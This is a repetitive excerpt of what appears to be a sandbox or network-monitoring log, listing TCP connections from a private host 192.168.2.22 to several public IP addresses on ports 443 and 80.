                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 213.183.76.22:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 213.183.76.22:443
                    Source: global trafficTCP traffic: 192.168.2.22:49176 -> 213.183.76.22:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
